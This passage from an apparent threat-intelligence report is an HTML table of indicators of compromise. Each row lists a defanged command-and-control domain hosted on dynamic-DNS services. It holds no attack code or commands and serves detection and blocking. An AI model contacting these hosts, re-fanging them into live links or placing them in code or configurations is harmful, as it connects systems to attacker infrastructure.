<p><code style="vertical-align: baseline;">mlksucnayesk[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mmmfaco2025[.]mywire[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mms[.]bumbleshrimp[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mmvmtools[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">modgood[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Mosplosaq[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mysql[.]casacam[.]net</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nenigncagvawr[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nenignenigoncqvoo[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nenigoncqnutgo[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nenigoncuopzc[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nims[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nisaldwoa[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nmszablogs[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nodekeny11[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">nodjs2o25nodjs[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Npeoples[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">officeshan[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">okkstt[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">oldatain1[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">onlyosun[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">osix[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ovmmiuy[.]mywire[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">palamolscueajfvc[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pawanp[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pcmainecia[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pcvmts3[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">peisuesacae[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">peowork[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pepesetup[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pewsus[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">plcoaweniva[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">PolicyAgent[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">polokinyea[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pplodsssead222[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pplosad231[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ppsaBedon[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">prdanjana01[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">prepaid127[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">PRIFTP[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">prihxlcs[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">prihxlcsw[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pxlaxvvva[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">quitgod2023luck[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">rabbit[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">rsm323[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">saf3asg[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Scopps[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sdhite43[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sdsuytoins63[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">selfad[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">serious[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">setupcodpr2[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sgsn[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Smartfren[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sn0son4t31bbsvopou[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">sn0son4t31opc[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">soovuy[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">styuij[.]mywire[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">supceasfg1[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">systemsz[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t31c0mjumpcuyerop[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t31c0mopamcuiomx[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t31c0mopmiuewklg[.]webredirect[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t31c0mopocuveop[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t3lc0mcanyqbfac[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t3lc0mczmoihwc[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t3lc0mh4udncifw[.]casacam[.]net</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t3lc0mhasvnctsk[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">t3lm0rtlcagratu[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">tch[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">telcomn[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">telen[.]bumbleshrimp[.]com</code></p> </td> </tr> <tr> 